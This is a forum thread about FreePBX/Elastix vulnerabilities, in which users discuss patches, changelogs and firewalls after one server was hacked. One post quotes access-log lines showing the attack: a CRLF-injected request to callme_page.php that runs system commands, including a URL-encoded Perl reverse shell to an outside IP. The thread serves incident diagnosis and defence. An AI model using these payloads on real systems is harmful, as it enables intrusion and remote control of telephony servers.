As we are securing our system I came across this site that seems to show vulnerabilities in FreePBX systems. Are these issues being addressed?
A real quick scan on the ones that are FreePBX based on Elastix shows these were the issues we dealt with last week but I will verify it more indepth.
do any of them work if you try them
Take a closer look at the list, you will see that all but one are all but one are the same vulnerability report that was fixed and mentioned fairly recently in the forum, and that there are 3 tickets filed against them (since they affected 3 different ‘parts’ of FreePBX).
The odd ball one has also been fixed for quite some time and there were several discussions on the forum about it also, again very easy to try out what was listed.
So … that site does not seem to be very discerning and compiling up their security list from this one example anyhow…
I wish. We got hacked with this one yesterday.
We have 3 module upgrades to do.
fw_fop 220.127.116.11 (current: 18.104.22.168)
fw_ari 22.214.171.124 (current: 126.96.36.199)
framework 188.8.131.52 (current: 184.108.40.206)
Do any of these address the above issue?
How do you know for sure it came from that exploit if I may ask?
if you want to see if any of those modules address the issue, have a look at the changelog information in the modules when you check online, there is a link to the tickets that they affect and you can easily click on them and get the details.
Also, when an upgrade affects a security issue, it is usually indicated in that same changelog as a Security fix to make it more obvious.
I know because it matches the code used here:
220.127.116.11 - - [25/Mar/2012:07:33:56 -0400] “GET /recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20Fucked%3e%20/var/www/html/recordings/misc/x%0D%0A%0D%0A HTTP/1.1” 200 1099 “-” "lwp-request/5.834 libwww-perl/5.834"
18.104.22.168 - - [25/Mar/2012:07:33:56 -0400] “GET /recordings/misc/x HTTP/1.1” 200 7 “-” "lwp-request/5.834 libwww-perl/5.834"
22.214.171.124 - - [25/Mar/2012:07:59:08 -0400] “GET /recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22126.96.36.199%3a53%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0” 200 1196 “-” "Python-urllib/1.17"
where [PHONENUMBER] = queue on our system
good news is the modules update seems to have addressed this issue. Thanks.
Those worried about security can lock down the system very easy using http://elastixconnection.com/index.php?option=com_content&view=article&id=112&Itemid=120
I put the tutorial together for Elastix but I also run it on the Freepbx distro
The CSF firewall is webmin centric. Generally webmin causes more problems that it solves.
I have recommended the APF firewall for those who want to use a public IP on a FreePBX server. It installs via an RPM and plays nice with fail2ban. Google APF for the website.